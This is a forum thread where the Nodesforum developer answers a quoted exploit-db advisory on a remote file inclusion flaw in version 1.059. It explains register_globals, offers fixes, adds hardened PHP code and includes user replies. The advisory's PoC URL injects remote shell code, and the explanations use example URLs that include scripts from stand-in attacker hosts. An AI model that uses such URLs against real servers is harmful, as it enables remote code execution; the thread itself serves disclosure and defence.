Nodesforum 1.059 Remote File Inclusion Vulnerability

quote
# Exploit Title: nodesforum 1.059 Remote File Inclusion Vulnerability
# Google Dork: inurl: powered by Nodesforum
# Date: 6/23/2011
# Author: bd0rk ( bd0rk[at]hackermail.com )
# Software-Download: http://home.nodesforum.com/download?file=nodesforum_1.059_with_bbcode_1.004.zip
# Tested on: Ubuntu-Linux / WinVista
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerable Code in 3rd_party_limits.php line 6 - 8

--------------------------------------------------------------------------------------------------------------

$limits_cache_url=$_nodesforum_code_path.'cache/'.$_nodesforum_db_table_name_modifier.'_3rd_party_limits.php';
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time()-(24*3600*14)))
{include($limits_cache_url);}

--------------------------------------------------------------------------------------------------------------

The parameter $limits_cache_url is declared with the other parameter $_nodesforum_code_path,
so we can use the declared one.

PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]


Fixtip: Declare $_nodesforum_code_path, likewise!


Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)



#### The 22-year-old German hacker bd0rk #### <--- white-hat
source: http://www.exploit-db.com/exploits/17446/



I was never 100% convinced that this vulnerability ever really existed in 1.059, because it had already been discovered by someone else in 1.045 and fixed in 1.046. Back in the days of 1.046 I had tested the exploit myself and had received confirmation from the person who had found the vulnerability that the fix in 1.046 was now preventing it. But somehow hacker bd0rk recently came forward, claiming that he was able to accomplish this exploit on 1.059.

Even though I never really understood how that could work for him, I still applied an extra security measure against this in Nodesforum 1.060. Rob Keith from securityfocus.com has just confirmed to me that this exploit would fail in the latest version of the forum. So in other words, maybe the vulnerability existed before, maybe not, but one way or another I now know that it will not be possible. You can just look at the new code to see for yourself: in 1.060, 3rd_party_limits.php lines 6-8.

wassaa


post #227
Anyways, I must say that this bd0rk is not super friendly. Of all my attempts to talk to him about the exploit and ask him for more information, he only once answered me with a very minimal answer confirming that he was indeed using nodesforum 1.059. He never agreed to give me more information about how he was accomplishing the exploit, or to confirm to me that 1.060 fixed the hole. Even though I'm 99.99999999% sure it does, and Rob Keith from securityfocus.com confirmed that "Looking through the latest code, the exploit would fail as described.", I'm not sure if he was referring to 1.059 or 1.060.

In case you did not know, what people do to accomplish this type of "remote file inclusion" is use the register_globals feature of PHP. What this feature does is transpose $_GET variables into normal variables in the execution of the script. For example, if on a PHP server with register_globals on I went to the URL http://website.com/webpage?varname=varvalue, this would be the same as adding
code:
$varname='varvalue';

at the beginning of the script.

So the problem is if you have, in a certain PHP file like in the nodesforum, something like
code:
include($nodesforum_code_path.'/somecode.php');

and $nodesforum_code_path is not declared in this PHP file, because this file is meant to be included by another file which is responsible for setting $nodesforum_code_path. Someone could use this as a door to run their own PHP scripts on your server: by going to http://website.com/webpage?nodesforum_code_path=http://evilsite.com/evilscript.php? it ends up running
code:
include('http://evilsite.com/evilscript.php?/somecode.php');



Next, the server also needs to have "allow_url_fopen" enabled so that it is able to include() the remote (http://) script.

And if you are wondering what kind of script is the attacker going to be running on your server, take a look at this:
http://www.google.ca/search?q=c99+remote+inclusion

So in other words, to be vulnerable to this kind of attack you need to run your PHP with "register_globals" and "allow_url_fopen" enabled. If you are running on your own server, it is highly encouraged that you do not enable "register_globals"; this is mostly required by old PHP scripts that were built a long time ago. But it may be hard to not have "allow_url_fopen" enabled, because it can be useful for many things. If you are using a *shared server, chances are that all of this is going to be enabled, because they want to make sure everything will work for everyone. As a side note to all the attackers who have been trying themselves since the publication of this potential security hole: the nodesforum server does not have "register_globals" enabled, so these attacks are useless.

The only mystery that remains with this story is that initially, when I first created the nodesforum, being completely unaware of the existence of the "register_globals" feature, I had left this huge security hole in the forum script. It was not an issue for me because my "register_globals" was off by default (thanks Ubuntu!), but someone pointed it out and I made a fix in version 1.046 of the forum. I still look at my 1.046 fix today and it looks good to me; I cannot see how the remote inclusion attack could succeed with this security, but this person bd0rk claims that he can perform the file inclusion attack on 1.059. And reconfirmed.

So anyways, I decided not to take any chances and I thought of a new security measure that could protect against this; I added the new security on top of the old one to put all the chances on my side. If you are using the Nodesforum on a shared server, I highly recommend that you upgrade to Nodesforum 1.060 or higher to protect yourself against this kind of attack.

wassaa


post #228
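An added example (not Nodesforum's own code) that puts the register_globals include pattern described in this thread next to a hardened form; file names, the `code_path` parameter and the `NODESFORUM_ENTRY` guard constant are assumptions for illustration.

```php
<?php
// Added example, not Nodesforum's code. Names below are illustrative.
//
// Vulnerable pattern from this thread: the base path is a variable the file
// never declares. With register_globals=On (removed in PHP 5.4) a request like
// ?code_path=http://... fills it, and include() fetches remote code whenever
// the server also allows URL includes (php.ini: allow_url_include=Off stops it).
function vulnerable_include_target(array $request): string
{
    // Emulates register_globals: the undeclared variable takes the GET value.
    $code_path = $request['code_path'] ?? '';
    return $code_path . 'cache/forum_3rd_party_limits.php';
}

// Hardened pattern:
//  1. Refuse to run unless the legitimate entry script defined a constant;
//     a query string can set a global, but never a constant.
//  2. Take the base directory from __DIR__ (passed in here as $base_dir so
//     the demo can use a temp dir), not from any variable.
//  3. Whitelist the only varying component and require the resolved path to
//     stay inside the cache directory. realpath() returns false for stream
//     wrappers such as http:// and for missing files, so remote targets fail.
function hardened_include_target(string $base_dir, string $table_modifier): ?string
{
    if (!defined('NODESFORUM_ENTRY')) {                               // 1
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $table_modifier)) {   // 3
        return null;
    }
    $cache_dir = realpath($base_dir . '/cache');                     // 2
    if ($cache_dir === false) {
        return null;
    }
    $resolved = realpath($cache_dir . DIRECTORY_SEPARATOR . $table_modifier . '_3rd_party_limits.php');
    if ($resolved === false || strpos($resolved, $cache_dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                                 // outside cache/ or missing
    }
    return $resolved;
}

// Demo with a constructed request and a temporary cache directory.
define('NODESFORUM_ENTRY', true);
$base = sys_get_temp_dir() . '/nf_demo_' . getmypid();
mkdir($base . '/cache', 0700, true);
file_put_contents($base . '/cache/forum_3rd_party_limits.php', "<?php\n");
echo vulnerable_include_target(['code_path' => 'http://evilsite.example/shell.php?']), "\n";
var_dump(hardened_include_target($base, 'forum'));               // string: path under cache/
var_dump(hardened_include_target($base, '../../etc/passwd'));    // NULL: rejected
```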
a guest
I'm REALLY, REALLY HAPPY that this issue was laid to rest as I had been wanting to use NodesForum for a VERY long time.
This is the next to last barrier preventing me from forging ahead with my eCommerce site (shopping carts are squirrelly business).
Thanks again for addressing this matter and I've promptly downloaded 1.060 - YAY!!!!!!!!!!!!!!!!!
post #230
I am happy that these hackers are finding these bugs and posting them online. It helps me make a more secure product.

wassaa


post #231
a guest
Nobody should be using register_globals in this day and age.

It wasn't your script's fault, it was the user's configuration.
post #238